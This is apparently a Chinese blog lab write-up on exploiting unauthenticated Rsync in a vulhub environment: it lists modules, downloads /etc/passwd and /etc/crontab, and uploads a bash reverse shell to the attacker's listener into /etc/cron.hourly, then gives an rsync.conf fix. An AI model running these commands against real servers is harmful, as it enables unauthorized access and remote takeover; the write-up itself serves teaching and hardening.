Rsync反弹shell

vulhub环境靶机 : 192.168.91.130
攻击机:kali 192.168.91.128

一、环境搭建

vulhub环境靶机环境搭建
​ 在纯净ubuntu中部署vulhub环境:

1、安装docker,并用docker -v命令验证安装结果;

​ curl -s https://get.docker.com/ | sh

在这里插入图片描述

2、安装python-pip,并用pip -V命令验证安装结果;

sudo apt-get install python-pip

在这里插入图片描述

​ 3、安装docker-compose,并用docker-compose -v验证安装结果

pip install docker-compose

在这里插入图片描述

4、将vulhub解压至ubuntu一个路径下:/vulhub-master/

5、进入到相应的漏洞下,docker-compose up -d命令启动容器,使用docker-compose down命令关闭容器。

在这里插入图片描述

sudo docker-compose up

在这里插入图片描述

二、Rsync非授权访问

1.可以对目标服务器进行扫描:

nmap -p  873 192.168.91.130

扫描结果:
在这里插入图片描述

2.查看模块名列表:

rsync rsync://192.168.91.130:873/

查看src模块

rsync rsync://192.168.91.130:873/src

结果如下:
在这里插入图片描述
可以看到目标机器的目录已经被列举出来了:

3.下载文件

rsync -av rsync://192.168.91.130/src/etc/passwd /root/passwd.txt

执行结果:
在这里插入图片描述

在这里插入图片描述

4.上传文件反弹shell

查看crontab配置文件:

rsync rsync://192.168.91.130/src/etc/crontab

5.下载crontab配置文件:

rsync -av rsync://192.168.91.130/src/etc/crontab /root/crontab.txt

查看其内容:
在这里插入图片描述

在这里插入图片描述
其中

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly

表示在每小时的第17分钟执行run-parts --report /etc/cron.hourly命令
shell 写法如下:

#!/bin/bash 
/bin/bash -i >& /dev/tcp/192.168.91.128/4444 0>&1

赋予执行权限:

chmod +x shell

将shell上传至/etc/cron.hourly

rsync -av shell rsync://192.168.91.130/src/etc/cron.hourly

本地监听:

nc -nvv -lp 4444

7.实验可以自己去修改/etc/crontab配置文件

查看docker容器 ID

docker ps 

在这里插入图片描述
进入docker

sudo docker exec -it a6cb5e784225  bash

在这里插入图片描述
打开/etc/crontab配置文件(vim自己安装。。)

vim /etc/crontab

把时间修改成自己想要的就好
在这里插入图片描述
等待时间的到来即可。成功反弹shell
在这里插入图片描述

三、修复

vim /etc/rsync.conf

写入以下代码

hosts allow xxx.xxx.xxx.xxx
auth users = rsync
secrets file = /etc/rsyncd.passwd

新建一个文件

vim /etc/rsyncd.passwd

按一下格式写入能登陆的用户名和密码

username  :password

就ok

posted @ 2018-11-18 13:13  浅笑996  阅读(255)  评论(0编辑  收藏  举报